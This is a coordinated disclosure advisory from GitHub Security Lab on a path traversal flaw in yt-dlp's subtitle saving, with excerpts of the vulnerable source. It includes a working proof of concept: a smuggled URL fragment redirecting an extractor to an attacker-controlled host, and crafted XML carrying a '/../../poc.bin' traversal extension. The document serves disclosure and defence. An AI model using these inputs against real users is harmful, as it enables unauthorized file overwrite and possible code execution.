Coordinated Disclosure Timeline

Summary

yt-dlp doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.

Project

yt-dlp

Tested Version

v2024.04.09

Details

Path traversal saving subtitles (GHSL-2024-090)

yt-dlp is capable of downloading not only video files, but also accompanying subtitles if the user specifies the --write-subs, --write-auto-subs, --all-subs or --write-srt option. Each supported video website has a dedicated extractor. Some extractors provide only URLs of subtitles and yt-dlp resolves their extension from the URL path. Others provide the URLs and the subtitle extensions explicitly. In turn, some of the latter extractors validate the extracted subtitle extension, but others trust the extracted value blindly. yt-dlp honors the provided extension name and uses it to build the name of the output file for subtitles in [1]. The filename is the generated name for the video file, sub_lang is en by default, sub_format is the extracted subtitles extension and info_dict.get('ext') contains the video file extension to replace with the sub_format in subtitles_filename. The subtitle is written as a binary file in [2]. If the user doesn’t override the default output file template %(title)s [%(id)s].%(ext)s, then the sub_filename is formatted as %(title)s [%(id)s].%(sub_lang).%(sub_format)s. The path traversal injection in sub_format doesn’t work on Linux because Linux doesn’t accept paths like not_existing_folder/../../file. But it does work on Windows.

        for sub_lang, sub_info in subtitles.items():
            sub_format = sub_info['ext']
            sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext')) # <------------- [1]
            sub_filename_final = subtitles_filename(sub_filename_base, sub_lang, sub_format, info_dict.get('ext'))
            existing_sub = self.existing_file((sub_filename_final, sub_filename))
            if existing_sub:
                self.to_screen(f'[info] Video subtitle {sub_lang}.{sub_format} is already present')
                sub_info['filepath'] = existing_sub
                ret.append((existing_sub, sub_filename_final))
                continue

            self.to_screen(f'[info] Writing video subtitles to: {sub_filename}')
#...

            try:
                sub_copy = sub_info.copy()
                sub_copy.setdefault('http_headers', info_dict.get('http_headers'))
                self.dl(sub_filename, sub_copy, subtitle=True) # <------------- [2]
                sub_info['filepath'] = sub_filename
                ret.append((sub_filename, sub_filename_final))
#...

Exploitability and Proof of Concept (PoC)

Intentionally crafted subtitle extension names in a supported website (such as youtube.com or bbc.co.uk) are not in the threat model of the report. However it is possible that the websites may be compromised at some moment of time. An XSS or SQL injection would allow the attacker to exploit a specific yt-dlp extractor. Then the attacker would need to wait for any yt-dlp user or trick a specific yt-dlp user to download the video with subtitles. However other yt-dlp features allow exploitation without compromising the video hosting website:

  1. URL smuggling. Some yt-dlp extractors attempt to get additional information from the URL part that comes after # - the fragment. The fragment is URL decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1] and retrieves base_url from it [2] and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked to run, for example, yt-dlp --write-subs https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D it will use an XML file from an attacker controlled site, site.com in this case, to extract subtitles and video files.
         url, smuggled_data = unsmuggle_url(url, {}) <------------- [1]
    
         mobj = self._match_valid_url(url)
         course_id = mobj.group('course_id')
         video_id = mobj.group('id')
    
         base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id) <------------- [2]
    
         settings = self._download_xml(
             '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id), <------------- [3]
             video_id, 'Downloading video settings XML')
    
  2. Generic extractor. yt-dlp allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a yt-dlp user. The user needs to run only yt-dlp --write-subs https://attacker.com/poc.html

For a PoC:

<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
<videoSettings version="1.5">
  <PlaylistItems>
    <PlaylistItem>
      <MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
      <MediaSource />
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
      <ThumbSource />
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>

Impact

This issue may lead to unauthorized file system modification and later may lead to remote code execution if an executable file is overwritten.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-090 in any communication regarding this issue.